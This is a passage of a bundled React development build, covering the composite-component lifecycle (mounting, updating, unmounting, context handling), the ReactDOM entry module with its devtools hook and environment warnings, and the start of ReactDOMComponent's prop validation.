componentWillUnmount()?', this.getName() || 'A component') : void 0;\n      \"development\" !== 'production' ? warning(typeof inst.componentWillRecieveProps !== 'function', '%s has a method called ' + 'componentWillRecieveProps(). Did you mean componentWillReceiveProps()?', this.getName() || 'A component') : void 0;\n    }\n\n    var initialState = inst.state;\n    if (initialState === undefined) {\n      inst.state = initialState = null;\n    }\n    !(typeof initialState === 'object' && !Array.isArray(initialState)) ? \"development\" !== 'production' ? invariant(false, '%s.state: must be set to an object or null', this.getName() || 'ReactCompositeComponent') : _prodInvariant('106', this.getName() || 'ReactCompositeComponent') : void 0;\n\n    this._pendingStateQueue = null;\n    this._pendingReplaceState = false;\n    this._pendingForceUpdate = false;\n\n    var markup;\n    if (inst.unstable_handleError) {\n      markup = this.performInitialMountWithErrorHandling(renderedElement, hostParent, hostContainerInfo, transaction, context);\n    } else {\n      markup = this.performInitialMount(renderedElement, hostParent, hostContainerInfo, transaction, context);\n    }\n\n    if (inst.componentDidMount) {\n      if (\"development\" !== 'production') {\n        transaction.getReactMountReady().enqueue(function () {\n          measureLifeCyclePerf(function () {\n            return inst.componentDidMount();\n          }, _this._debugID, 'componentDidMount');\n        });\n      } else {\n        transaction.getReactMountReady().enqueue(inst.componentDidMount, inst);\n      }\n    }\n\n    return markup;\n  },\n\n  _constructComponent: function (doConstruct, publicProps, publicContext, updateQueue) {\n    if (\"development\" !== 'production') {\n      ReactCurrentOwner.current = this;\n      try {\n        return this._constructComponentWithoutOwner(doConstruct, publicProps, publicContext, updateQueue);\n      } finally {\n        ReactCurrentOwner.current = null;\n      }\n    } else {\n      return this._constructComponentWithoutOwner(doConstruct, publicProps, publicContext, updateQueue);\n    }\n  },\n\n  _constructComponentWithoutOwner: function (doConstruct, publicProps, publicContext, updateQueue) {\n    var Component = this._currentElement.type;\n\n    if (doConstruct) {\n      if (\"development\" !== 'production') {\n        return measureLifeCyclePerf(function () {\n          return new Component(publicProps, publicContext, updateQueue);\n        }, this._debugID, 'ctor');\n      } else {\n        return new Component(publicProps, publicContext, updateQueue);\n      }\n    }\n\n    // This can still be an instance in case of factory components\n    // but we'll count this as time spent rendering as the more common case.\n    if (\"development\" !== 'production') {\n      return measureLifeCyclePerf(function () {\n        return Component(publicProps, publicContext, updateQueue);\n      }, this._debugID, 'render');\n    } else {\n      return Component(publicProps, publicContext, updateQueue);\n    }\n  },\n\n  performInitialMountWithErrorHandling: function (renderedElement, hostParent, hostContainerInfo, transaction, context) {\n    var markup;\n    var checkpoint = transaction.checkpoint();\n    try {\n      markup = this.performInitialMount(renderedElement, hostParent, hostContainerInfo, transaction, context);\n    } catch (e) {\n      // Roll back to checkpoint, handle error (which may add items to the transaction), and take a new checkpoint\n      transaction.rollback(checkpoint);\n      this._instance.unstable_handleError(e);\n      if (this._pendingStateQueue) {\n        this._instance.state = this._processPendingState(this._instance.props, this._instance.context);\n      }\n      checkpoint = transaction.checkpoint();\n\n      this._renderedComponent.unmountComponent(true);\n      transaction.rollback(checkpoint);\n\n      // Try again - we've informed the component about the error, so they can render an error message this time.\n      // If this throws again, the error will bubble up (and can be caught by a higher error boundary).\n      markup = this.performInitialMount(renderedElement, hostParent, hostContainerInfo, transaction, context);\n    }\n    return markup;\n  },\n\n  performInitialMount: function (renderedElement, hostParent, hostContainerInfo, transaction, context) {\n    var inst = this._instance;\n\n    var debugID = 0;\n    if (\"development\" !== 'production') {\n      debugID = this._debugID;\n    }\n\n    if (inst.componentWillMount) {\n      if (\"development\" !== 'production') {\n        measureLifeCyclePerf(function () {\n          return inst.componentWillMount();\n        }, debugID, 'componentWillMount');\n      } else {\n        inst.componentWillMount();\n      }\n      // When mounting, calls to `setState` by `componentWillMount` will set\n      // `this._pendingStateQueue` without triggering a re-render.\n      if (this._pendingStateQueue) {\n        inst.state = this._processPendingState(inst.props, inst.context);\n      }\n    }\n\n    // If not a stateless component, we now render\n    if (renderedElement === undefined) {\n      renderedElement = this._renderValidatedComponent();\n    }\n\n    var nodeType = ReactNodeTypes.getType(renderedElement);\n    this._renderedNodeType = nodeType;\n    var child = this._instantiateReactComponent(renderedElement, nodeType !== ReactNodeTypes.EMPTY /* shouldHaveDebugID */\n    );\n    this._renderedComponent = child;\n\n    var markup = ReactReconciler.mountComponent(child, transaction, hostParent, hostContainerInfo, this._processChildContext(context), debugID);\n\n    if (\"development\" !== 'production') {\n      if (debugID !== 0) {\n        var childDebugIDs = child._debugID !== 0 ? [child._debugID] : [];\n        ReactInstrumentation.debugTool.onSetChildren(debugID, childDebugIDs);\n      }\n    }\n\n    return markup;\n  },\n\n  getHostNode: function () {\n    return ReactReconciler.getHostNode(this._renderedComponent);\n  },\n\n  /**\n   * Releases any resources allocated by `mountComponent`.\n   *\n   * @final\n   * @internal\n   */\n  unmountComponent: function (safely) {\n    if (!this._renderedComponent) {\n      return;\n    }\n\n    var inst = this._instance;\n\n    if (inst.componentWillUnmount && !inst._calledComponentWillUnmount) {\n      inst._calledComponentWillUnmount = true;\n\n      if (safely) {\n        var name = this.getName() + '.componentWillUnmount()';\n        ReactErrorUtils.invokeGuardedCallback(name, inst.componentWillUnmount.bind(inst));\n      } else {\n        if (\"development\" !== 'production') {\n          measureLifeCyclePerf(function () {\n            return inst.componentWillUnmount();\n          }, this._debugID, 'componentWillUnmount');\n        } else {\n          inst.componentWillUnmount();\n        }\n      }\n    }\n\n    if (this._renderedComponent) {\n      ReactReconciler.unmountComponent(this._renderedComponent, safely);\n      this._renderedNodeType = null;\n      this._renderedComponent = null;\n      this._instance = null;\n    }\n\n    // Reset pending fields\n    // Even if this component is scheduled for another update in ReactUpdates,\n    // it would still be ignored because these fields are reset.\n    this._pendingStateQueue = null;\n    this._pendingReplaceState = false;\n    this._pendingForceUpdate = false;\n    this._pendingCallbacks = null;\n    this._pendingElement = null;\n\n    // These fields do not really need to be reset since this object is no\n    // longer accessible.\n    this._context = null;\n    this._rootNodeID = 0;\n    this._topLevelWrapper = null;\n\n    // Delete the reference from the instance to this internal representation\n    // which allow the internals to be properly cleaned up even if the user\n    // leaks a reference to the public instance.\n    ReactInstanceMap.remove(inst);\n\n    // Some existing components rely on inst.props even after they've been\n    // destroyed (in event handlers).\n    // TODO: inst.props = null;\n    // TODO: inst.state = null;\n    // TODO: inst.context = null;\n  },\n\n  /**\n   * Filters the context object to only contain keys specified in\n   * `contextTypes`\n   *\n   * @param {object} context\n   * @return {?object}\n   * @private\n   */\n  _maskContext: function (context) {\n    var Component = this._currentElement.type;\n    var contextTypes = Component.contextTypes;\n    if (!contextTypes) {\n      return emptyObject;\n    }\n    var maskedContext = {};\n    for (var contextName in contextTypes) {\n      maskedContext[contextName] = context[contextName];\n    }\n    return maskedContext;\n  },\n\n  /**\n   * Filters the context object to only contain keys specified in\n   * `contextTypes`, and asserts that they are valid.\n   *\n   * @param {object} context\n   * @return {?object}\n   * @private\n   */\n  _processContext: function (context) {\n    var maskedContext = this._maskContext(context);\n    if (\"development\" !== 'production') {\n      var Component = this._currentElement.type;\n      if (Component.contextTypes) {\n        this._checkContextTypes(Component.contextTypes, maskedContext, 'context');\n      }\n    }\n    return maskedContext;\n  },\n\n  /**\n   * @param {object} currentContext\n   * @return {object}\n   * @private\n   */\n  _processChildContext: function (currentContext) {\n    var Component = this._currentElement.type;\n    var inst = this._instance;\n    var childContext;\n\n    if (inst.getChildContext) {\n      if (\"development\" !== 'production') {\n        ReactInstrumentation.debugTool.onBeginProcessingChildContext();\n        try {\n          childContext = inst.getChildContext();\n        } finally {\n          ReactInstrumentation.debugTool.onEndProcessingChildContext();\n        }\n      } else {\n        childContext = inst.getChildContext();\n      }\n    }\n\n    if (childContext) {\n      !(typeof Component.childContextTypes === 'object') ? \"development\" !== 'production' ? invariant(false, '%s.getChildContext(): childContextTypes must be defined in order to use getChildContext().', this.getName() || 'ReactCompositeComponent') : _prodInvariant('107', this.getName() || 'ReactCompositeComponent') : void 0;\n      if (\"development\" !== 'production') {\n        this._checkContextTypes(Component.childContextTypes, childContext, 'child context');\n      }\n      for (var name in childContext) {\n        !(name in Component.childContextTypes) ? \"development\" !== 'production' ? invariant(false, '%s.getChildContext(): key \"%s\" is not defined in childContextTypes.', this.getName() || 'ReactCompositeComponent', name) : _prodInvariant('108', this.getName() || 'ReactCompositeComponent', name) : void 0;\n      }\n      return _assign({}, currentContext, childContext);\n    }\n    return currentContext;\n  },\n\n  /**\n   * Assert that the context types are valid\n   *\n   * @param {object} typeSpecs Map of context field to a ReactPropType\n   * @param {object} values Runtime values that need to be type-checked\n   * @param {string} location e.g. \"prop\", \"context\", \"child context\"\n   * @private\n   */\n  _checkContextTypes: function (typeSpecs, values, location) {\n    if (\"development\" !== 'production') {\n      checkReactTypeSpec(typeSpecs, values, location, this.getName(), null, this._debugID);\n    }\n  },\n\n  receiveComponent: function (nextElement, transaction, nextContext) {\n    var prevElement = this._currentElement;\n    var prevContext = this._context;\n\n    this._pendingElement = null;\n\n    this.updateComponent(transaction, prevElement, nextElement, prevContext, nextContext);\n  },\n\n  /**\n   * If any of `_pendingElement`, `_pendingStateQueue`, or `_pendingForceUpdate`\n   * is set, update the component.\n   *\n   * @param {ReactReconcileTransaction} transaction\n   * @internal\n   */\n  performUpdateIfNecessary: function (transaction) {\n    if (this._pendingElement != null) {\n      ReactReconciler.receiveComponent(this, this._pendingElement, transaction, this._context);\n    } else if (this._pendingStateQueue !== null || this._pendingForceUpdate) {\n      this.updateComponent(transaction, this._currentElement, this._currentElement, this._context, this._context);\n    } else {\n      this._updateBatchNumber = null;\n    }\n  },\n\n  /**\n   * Perform an update to a mounted component. The componentWillReceiveProps and\n   * shouldComponentUpdate methods are called, then (assuming the update isn't\n   * skipped) the remaining update lifecycle methods are called and the DOM\n   * representation is updated.\n   *\n   * By default, this implements React's rendering and reconciliation algorithm.\n   * Sophisticated clients may wish to override this.\n   *\n   * @param {ReactReconcileTransaction} transaction\n   * @param {ReactElement} prevParentElement\n   * @param {ReactElement} nextParentElement\n   * @internal\n   * @overridable\n   */\n  updateComponent: function (transaction, prevParentElement, nextParentElement, prevUnmaskedContext, nextUnmaskedContext) {\n    var inst = this._instance;\n    !(inst != null) ? \"development\" !== 'production' ? invariant(false, 'Attempted to update component `%s` that has already been unmounted (or failed to mount).', this.getName() || 'ReactCompositeComponent') : _prodInvariant('136', this.getName() || 'ReactCompositeComponent') : void 0;\n\n    var willReceive = false;\n    var nextContext;\n\n    // Determine if the context has changed or not\n    if (this._context === nextUnmaskedContext) {\n      nextContext = inst.context;\n    } else {\n      nextContext = this._processContext(nextUnmaskedContext);\n      willReceive = true;\n    }\n\n    var prevProps = prevParentElement.props;\n    var nextProps = nextParentElement.props;\n\n    // Not a simple state update but a props update\n    if (prevParentElement !== nextParentElement) {\n      willReceive = true;\n    }\n\n    // An update here will schedule an update but immediately set\n    // _pendingStateQueue which will ensure that any state updates gets\n    // immediately reconciled instead of waiting for the next batch.\n    if (willReceive && inst.componentWillReceiveProps) {\n      if (\"development\" !== 'production') {\n        measureLifeCyclePerf(function () {\n          return inst.componentWillReceiveProps(nextProps, nextContext);\n        }, this._debugID, 'componentWillReceiveProps');\n      } else {\n        inst.componentWillReceiveProps(nextProps, nextContext);\n      }\n    }\n\n    var nextState = this._processPendingState(nextProps, nextContext);\n    var shouldUpdate = true;\n\n    if (!this._pendingForceUpdate) {\n      if (inst.shouldComponentUpdate) {\n        if (\"development\" !== 'production') {\n          shouldUpdate = measureLifeCyclePerf(function () {\n            return inst.shouldComponentUpdate(nextProps, nextState, nextContext);\n          }, this._debugID, 'shouldComponentUpdate');\n        } else {\n          shouldUpdate = inst.shouldComponentUpdate(nextProps, nextState, nextContext);\n        }\n      } else {\n        if (this._compositeType === CompositeTypes.PureClass) {\n          shouldUpdate = !shallowEqual(prevProps, nextProps) || !shallowEqual(inst.state, nextState);\n        }\n      }\n    }\n\n    if (\"development\" !== 'production') {\n      \"development\" !== 'production' ? warning(shouldUpdate !== undefined, '%s.shouldComponentUpdate(): Returned undefined instead of a ' + 'boolean value. Make sure to return true or false.', this.getName() || 'ReactCompositeComponent') : void 0;\n    }\n\n    this._updateBatchNumber = null;\n    if (shouldUpdate) {\n      this._pendingForceUpdate = false;\n      // Will set `this.props`, `this.state` and `this.context`.\n      this._performComponentUpdate(nextParentElement, nextProps, nextState, nextContext, transaction, nextUnmaskedContext);\n    } else {\n      // If it's determined that a component should not update, we still want\n      // to set props and state but we shortcut the rest of the update.\n      this._currentElement = nextParentElement;\n      this._context = nextUnmaskedContext;\n      inst.props = nextProps;\n      inst.state = nextState;\n      inst.context = nextContext;\n    }\n  },\n\n  _processPendingState: function (props, context) {\n    var inst = this._instance;\n    var queue = this._pendingStateQueue;\n    var replace = this._pendingReplaceState;\n    this._pendingReplaceState = false;\n    this._pendingStateQueue = null;\n\n    if (!queue) {\n      return inst.state;\n    }\n\n    if (replace && queue.length === 1) {\n      return queue[0];\n    }\n\n    var nextState = _assign({}, replace ? queue[0] : inst.state);\n    for (var i = replace ? 1 : 0; i < queue.length; i++) {\n      var partial = queue[i];\n      _assign(nextState, typeof partial === 'function' ? partial.call(inst, nextState, props, context) : partial);\n    }\n\n    return nextState;\n  },\n\n  /**\n   * Merges new props and state, notifies delegate methods of update and\n   * performs update.\n   *\n   * @param {ReactElement} nextElement Next element\n   * @param {object} nextProps Next public object to set as properties.\n   * @param {?object} nextState Next object to set as state.\n   * @param {?object} nextContext Next public object to set as context.\n   * @param {ReactReconcileTransaction} transaction\n   * @param {?object} unmaskedContext\n   * @private\n   */\n  _performComponentUpdate: function (nextElement, nextProps, nextState, nextContext, transaction, unmaskedContext) {\n    var _this2 = this;\n\n    var inst = this._instance;\n\n    var hasComponentDidUpdate = Boolean(inst.componentDidUpdate);\n    var prevProps;\n    var prevState;\n    var prevContext;\n    if (hasComponentDidUpdate) {\n      prevProps = inst.props;\n      prevState = inst.state;\n      prevContext = inst.context;\n    }\n\n    if (inst.componentWillUpdate) {\n      if (\"development\" !== 'production') {\n        measureLifeCyclePerf(function () {\n          return inst.componentWillUpdate(nextProps, nextState, nextContext);\n        }, this._debugID, 'componentWillUpdate');\n      } else {\n        inst.componentWillUpdate(nextProps, nextState, nextContext);\n      }\n    }\n\n    this._currentElement = nextElement;\n    this._context = unmaskedContext;\n    inst.props = nextProps;\n    inst.state = nextState;\n    inst.context = nextContext;\n\n    this._updateRenderedComponent(transaction, unmaskedContext);\n\n    if (hasComponentDidUpdate) {\n      if (\"development\" !== 'production') {\n        transaction.getReactMountReady().enqueue(function () {\n          measureLifeCyclePerf(inst.componentDidUpdate.bind(inst, prevProps, prevState, prevContext), _this2._debugID, 'componentDidUpdate');\n        });\n      } else {\n        transaction.getReactMountReady().enqueue(inst.componentDidUpdate.bind(inst, prevProps, prevState, prevContext), inst);\n      }\n    }\n  },\n\n  /**\n   * Call the component's `render` method and update the DOM accordingly.\n   *\n   * @param {ReactReconcileTransaction} transaction\n   * @internal\n   */\n  _updateRenderedComponent: function (transaction, context) {\n    var prevComponentInstance = this._renderedComponent;\n    var prevRenderedElement = prevComponentInstance._currentElement;\n    var nextRenderedElement = this._renderValidatedComponent();\n\n    var debugID = 0;\n    if (\"development\" !== 'production') {\n      debugID = this._debugID;\n    }\n\n    if (shouldUpdateReactComponent(prevRenderedElement, nextRenderedElement)) {\n      ReactReconciler.receiveComponent(prevComponentInstance, nextRenderedElement, transaction, this._processChildContext(context));\n    } else {\n      var oldHostNode = ReactReconciler.getHostNode(prevComponentInstance);\n      ReactReconciler.unmountComponent(prevComponentInstance, false);\n\n      var nodeType = ReactNodeTypes.getType(nextRenderedElement);\n      this._renderedNodeType = nodeType;\n      var child = this._instantiateReactComponent(nextRenderedElement, nodeType !== ReactNodeTypes.EMPTY /* shouldHaveDebugID */\n      );\n      this._renderedComponent = child;\n\n      var nextMarkup = ReactReconciler.mountComponent(child, transaction, this._hostParent, this._hostContainerInfo, this._processChildContext(context), debugID);\n\n      if (\"development\" !== 'production') {\n        if (debugID !== 0) {\n          var childDebugIDs = child._debugID !== 0 ? [child._debugID] : [];\n          ReactInstrumentation.debugTool.onSetChildren(debugID, childDebugIDs);\n        }\n      }\n\n      this._replaceNodeWithMarkup(oldHostNode, nextMarkup, prevComponentInstance);\n    }\n  },\n\n  /**\n   * Overridden in shallow rendering.\n   *\n   * @protected\n   */\n  _replaceNodeWithMarkup: function (oldHostNode, nextMarkup, prevInstance) {\n    ReactComponentEnvironment.replaceNodeWithMarkup(oldHostNode, nextMarkup, prevInstance);\n  },\n\n  /**\n   * @protected\n   */\n  _renderValidatedComponentWithoutOwnerOrContext: function () {\n    var inst = this._instance;\n    var renderedElement;\n\n    if (\"development\" !== 'production') {\n      renderedElement = measureLifeCyclePerf(function () {\n        return inst.render();\n      }, this._debugID, 'render');\n    } else {\n      renderedElement = inst.render();\n    }\n\n    if (\"development\" !== 'production') {\n      // We allow auto-mocks to proceed as if they're returning null.\n      if (renderedElement === undefined && inst.render._isMockFunction) {\n        // This is probably bad practice. Consider warning here and\n        // deprecating this convenience.\n        renderedElement = null;\n      }\n    }\n\n    return renderedElement;\n  },\n\n  /**\n   * @private\n   */\n  _renderValidatedComponent: function () {\n    var renderedElement;\n    if (\"development\" !== 'production' || this._compositeType !== CompositeTypes.StatelessFunctional) {\n      ReactCurrentOwner.current = this;\n      try {\n        renderedElement = this._renderValidatedComponentWithoutOwnerOrContext();\n      } finally {\n        ReactCurrentOwner.current = null;\n      }\n    } else {\n      renderedElement = this._renderValidatedComponentWithoutOwnerOrContext();\n    }\n    !(\n    // TODO: An `isValidNode` function would probably be more appropriate\n    renderedElement === null || renderedElement === false || React.isValidElement(renderedElement)) ? \"development\" !== 'production' ? invariant(false, '%s.render(): A valid React element (or null) must be returned. You may have returned undefined, an array or some other invalid object.', this.getName() || 'ReactCompositeComponent') : _prodInvariant('109', this.getName() || 'ReactCompositeComponent') : void 0;\n\n    return renderedElement;\n  },\n\n  /**\n   * Lazily allocates the refs object and stores `component` as `ref`.\n   *\n   * @param {string} ref Reference name.\n   * @param {component} component Component to store as `ref`.\n   * @final\n   * @private\n   */\n  attachRef: function (ref, component) {\n    var inst = this.getPublicInstance();\n    !(inst != null) ? \"development\" !== 'production' ? invariant(false, 'Stateless function components cannot have refs.') : _prodInvariant('110') : void 0;\n    var publicComponentInstance = component.getPublicInstance();\n    if (\"development\" !== 'production') {\n      var componentName = component && component.getName ? component.getName() : 'a component';\n      \"development\" !== 'production' ? warning(publicComponentInstance != null || component._compositeType !== CompositeTypes.StatelessFunctional, 'Stateless function components cannot be given refs ' + '(See ref \"%s\" in %s created by %s). ' + 'Attempts to access this ref will fail.', ref, componentName, this.getName()) : void 0;\n    }\n    var refs = inst.refs === emptyObject ? inst.refs = {} : inst.refs;\n    refs[ref] = publicComponentInstance;\n  },\n\n  /**\n   * Detaches a reference name.\n   *\n   * @param {string} ref Name to dereference.\n   * @final\n   * @private\n   */\n  detachRef: function (ref) {\n    var refs = this.getPublicInstance().refs;\n    delete refs[ref];\n  },\n\n  /**\n   * Get a text description of the component that can be used to identify it\n   * in error messages.\n   * @return {string} The name or null.\n   * @internal\n   */\n  getName: function () {\n    var type = this._currentElement.type;\n    var constructor = this._instance && this._instance.constructor;\n    return type.displayName || constructor && constructor.displayName || type.name || constructor && constructor.name || null;\n  },\n\n  /**\n   * Get the publicly accessible representation of this component - i.e. what\n   * is exposed by refs and returned by render. Can be null for stateless\n   * components.\n   *\n   * @return {ReactComponent} the public component instance.\n   * @internal\n   */\n  getPublicInstance: function () {\n    var inst = this._instance;\n    if (this._compositeType === CompositeTypes.StatelessFunctional) {\n      return null;\n    }\n    return inst;\n  },\n\n  // Stub\n  _instantiateReactComponent: null\n};\n\nmodule.exports = ReactCompositeComponent;\n},{\"104\":104,\"126\":126,\"130\":130,\"134\":134,\"135\":135,\"145\":145,\"152\":152,\"158\":158,\"159\":159,\"160\":160,\"29\":29,\"55\":55,\"63\":63,\"64\":64,\"69\":69,\"75\":75}],31:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n/* globals __REACT_DEVTOOLS_GLOBAL_HOOK__*/\n\n'use strict';\n\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactDefaultInjection = _dereq_(52);\nvar ReactMount = _dereq_(67);\nvar ReactReconciler = _dereq_(75);\nvar ReactUpdates = _dereq_(82);\nvar ReactVersion = _dereq_(83);\n\nvar findDOMNode = _dereq_(108);\nvar getHostComponentFromComposite = _dereq_(115);\nvar renderSubtreeIntoContainer = _dereq_(127);\nvar warning = _dereq_(159);\n\nReactDefaultInjection.inject();\n\nvar ReactDOM = {\n  findDOMNode: findDOMNode,\n  render: ReactMount.render,\n  unmountComponentAtNode: ReactMount.unmountComponentAtNode,\n  version: ReactVersion,\n\n  /* eslint-disable camelcase */\n  unstable_batchedUpdates: ReactUpdates.batchedUpdates,\n  unstable_renderSubtreeIntoContainer: renderSubtreeIntoContainer\n  /* eslint-enable camelcase */\n};\n\n// Inject the runtime into a devtools global hook regardless of browser.\n// Allows for debugging when the hook is injected on the page.\nif (typeof __REACT_DEVTOOLS_GLOBAL_HOOK__ !== 'undefined' && typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.inject === 'function') {\n  __REACT_DEVTOOLS_GLOBAL_HOOK__.inject({\n    ComponentTree: {\n      getClosestInstanceFromNode: ReactDOMComponentTree.getClosestInstanceFromNode,\n      getNodeFromInstance: function (inst) {\n        // inst is an internal instance (but could be a composite)\n        if (inst._renderedComponent) {\n          inst = getHostComponentFromComposite(inst);\n        }\n        if (inst) {\n          return ReactDOMComponentTree.getNodeFromInstance(inst);\n        } else {\n          return null;\n        }\n      }\n    },\n    Mount: ReactMount,\n    Reconciler: ReactReconciler\n  });\n}\n\nif (\"development\" !== 'production') {\n  var ExecutionEnvironment = _dereq_(138);\n  if (ExecutionEnvironment.canUseDOM && window.top === window.self) {\n    // First check if devtools is not installed\n    if (typeof __REACT_DEVTOOLS_GLOBAL_HOOK__ === 'undefined') {\n      // If we're in Chrome or Firefox, provide a download link if not installed.\n      if (navigator.userAgent.indexOf('Chrome') > -1 && navigator.userAgent.indexOf('Edge') === -1 || navigator.userAgent.indexOf('Firefox') > -1) {\n        // Firefox does not have the issue with devtools loaded over file://\n        var showFileUrlMessage = window.location.protocol.indexOf('http') === -1 && navigator.userAgent.indexOf('Firefox') === -1;\n        console.debug('Download the React DevTools ' + (showFileUrlMessage ? 'and use an HTTP server (instead of a file: URL) ' : '') + 'for a better development experience: ' + 'https://fb.me/react-devtools');\n      }\n    }\n\n    var testFunc = function testFn() {};\n    \"development\" !== 'production' ? warning((testFunc.name || testFunc.toString()).indexOf('testFn') !== -1, \"It looks like you're using a minified copy of the development build \" + 'of React. When deploying React apps to production, make sure to use ' + 'the production build which skips development warnings and is faster. ' + 'See https://fb.me/react-minification for more details.') : void 0;\n\n    // If we're in IE8, check to see if we are in compatibility mode and provide\n    // information on preventing compatibility mode\n    var ieCompatibilityMode = document.documentMode && document.documentMode < 8;\n\n    \"development\" !== 'production' ? warning(!ieCompatibilityMode, 'Internet Explorer is running in compatibility mode; please add the ' + 'following tag to your HTML to prevent this from happening: ' + '<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />') : void 0;\n\n    var expectedFeatures = [\n    // shims\n    Array.isArray, Array.prototype.every, Array.prototype.forEach, Array.prototype.indexOf, Array.prototype.map, Date.now, Function.prototype.bind, Object.keys, String.prototype.trim];\n\n    for (var i = 0; i < expectedFeatures.length; i++) {\n      if (!expectedFeatures[i]) {\n        \"development\" !== 'production' ? warning(false, 'One or more ES5 shims expected by React are not available: ' + 'https://fb.me/react-warning-polyfills') : void 0;\n        break;\n      }\n    }\n  }\n}\n\nif (\"development\" !== 'production') {\n  var ReactInstrumentation = _dereq_(64);\n  var ReactDOMUnknownPropertyHook = _dereq_(49);\n  var ReactDOMNullInputValuePropHook = _dereq_(41);\n  var ReactDOMInvalidARIAHook = _dereq_(40);\n\n  ReactInstrumentation.debugTool.addHook(ReactDOMUnknownPropertyHook);\n  ReactInstrumentation.debugTool.addHook(ReactDOMNullInputValuePropHook);\n  ReactInstrumentation.debugTool.addHook(ReactDOMInvalidARIAHook);\n}\n\nmodule.exports = ReactDOM;\n},{\"108\":108,\"115\":115,\"127\":127,\"138\":138,\"159\":159,\"34\":34,\"40\":40,\"41\":41,\"49\":49,\"52\":52,\"64\":64,\"67\":67,\"75\":75,\"82\":82,\"83\":83}],32:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n/* global hasOwnProperty:true */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126),\n    _assign = _dereq_(160);\n\nvar AutoFocusUtils = _dereq_(2);\nvar CSSPropertyOperations = _dereq_(5);\nvar DOMLazyTree = _dereq_(9);\nvar DOMNamespaces = _dereq_(10);\nvar DOMProperty = _dereq_(11);\nvar DOMPropertyOperations = _dereq_(12);\nvar EventPluginHub = _dereq_(17);\nvar EventPluginRegistry = _dereq_(18);\nvar ReactBrowserEventEmitter = _dereq_(26);\nvar ReactDOMComponentFlags = _dereq_(33);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactDOMInput = _dereq_(39);\nvar ReactDOMOption = _dereq_(42);\nvar ReactDOMSelect = _dereq_(43);\nvar ReactDOMTextarea = _dereq_(46);\nvar ReactInstrumentation = _dereq_(64);\nvar ReactMultiChild = _dereq_(68);\nvar ReactServerRenderingTransaction = _dereq_(77);\n\nvar emptyFunction = _dereq_(144);\nvar escapeTextContentForBrowser = _dereq_(107);\nvar invariant = _dereq_(152);\nvar isEventSupported = _dereq_(122);\nvar shallowEqual = _dereq_(158);\nvar inputValueTracking = _dereq_(120);\nvar validateDOMNesting = _dereq_(132);\nvar warning = _dereq_(159);\n\nvar Flags = ReactDOMComponentFlags;\nvar deleteListener = EventPluginHub.deleteListener;\nvar getNode = ReactDOMComponentTree.getNodeFromInstance;\nvar listenTo = ReactBrowserEventEmitter.listenTo;\nvar registrationNameModules = EventPluginRegistry.registrationNameModules;\n\n// For quickly matching children type, to test if can be treated as content.\nvar CONTENT_TYPES = { string: true, number: true };\n\nvar STYLE = 'style';\nvar HTML = '__html';\nvar RESERVED_PROPS = {\n  children: null,\n  dangerouslySetInnerHTML: null,\n  suppressContentEditableWarning: null\n};\n\n// Node type for document fragments (Node.DOCUMENT_FRAGMENT_NODE).\nvar DOC_FRAGMENT_TYPE = 11;\n\nfunction getDeclarationErrorAddendum(internalInstance) {\n  if (internalInstance) {\n    var owner = internalInstance._currentElement._owner || null;\n    if (owner) {\n      var name = owner.getName();\n      if (name) {\n        return ' This DOM node was rendered by `' + name + '`.';\n      }\n    }\n  }\n  return '';\n}\n\nfunction friendlyStringify(obj) {\n  if (typeof obj === 'object') {\n    if (Array.isArray(obj)) {\n      return '[' + obj.map(friendlyStringify).join(', ') + ']';\n    } else {\n      var pairs = [];\n      for (var key in obj) {\n        if (Object.prototype.hasOwnProperty.call(obj, key)) {\n          var keyEscaped = /^[a-z$_][\\w$_]*$/i.test(key) ? key : JSON.stringify(key);\n          pairs.push(keyEscaped + ': ' + friendlyStringify(obj[key]));\n        }\n      }\n      return '{' + pairs.join(', ') + '}';\n    }\n  } else if (typeof obj === 'string') {\n    return JSON.stringify(obj);\n  } else if (typeof obj === 'function') {\n    return '[function object]';\n  }\n  // Differs from JSON.stringify in that undefined because undefined and that\n  // inf and nan don't become null\n  return String(obj);\n}\n\nvar styleMutationWarning = {};\n\nfunction checkAndWarnForMutatedStyle(style1, style2, component) {\n  if (style1 == null || style2 == null) {\n    return;\n  }\n  if (shallowEqual(style1, style2)) {\n    return;\n  }\n\n  var componentName = component._tag;\n  var owner = component._currentElement._owner;\n  var ownerName;\n  if (owner) {\n    ownerName = owner.getName();\n  }\n\n  var hash = ownerName + '|' + componentName;\n\n  if (styleMutationWarning.hasOwnProperty(hash)) {\n    return;\n  }\n\n  styleMutationWarning[hash] = true;\n\n  \"development\" !== 'production' ? warning(false, '`%s` was passed a style object that has previously been mutated. ' + 'Mutating `style` is deprecated. Consider cloning it beforehand. Check ' + 'the `render` %s. Previous style: %s. Mutated style: %s.', componentName, owner ? 'of `' + ownerName + '`' : 'using <' + componentName + '>', friendlyStringify(style1), friendlyStringify(style2)) : void 0;\n}\n\n/**\n * @param {object} component\n * @param {?object} props\n */\nfunction assertValidProps(component, props) {\n  if (!props) {\n    return;\n  }\n  // Note the use of `==` which checks for null or undefined.\n  if (voidElementTags[component._tag]) {\n    !(props.children == null && props.dangerouslySetInnerHTML == null) ? \"development\" !== 'production' ? invariant(false, '%s is a void element tag and must neither have `children` nor use `dangerouslySetInnerHTML`.%s', component._tag, component._currentElement._owner ? ' Check the render method of ' + component._currentElement._owner.getName() + '.' : '') : _prodInvariant('137', component._tag, component._currentElement._owner ? ' Check the render method of ' + component._currentElement._owner.getName() + '.' : '') : void 0;\n  }\n  if (props.dangerouslySetInnerHTML != null) {\n    !(props.children == null) ? \"development\" !== 'production' ? invariant(false, 'Can only set one of `children` or `props.dangerouslySetInnerHTML`.') : _prodInvariant('60') : void 0;\n    !(typeof props.dangerouslySetInnerHTML === 'object' && HTML in props.dangerouslySetInnerHTML) ? \"development\" !== 'production' ? invariant(false, '`props.dangerouslySetInnerHTML` must be in the form `{__html: ...}`. Please visit 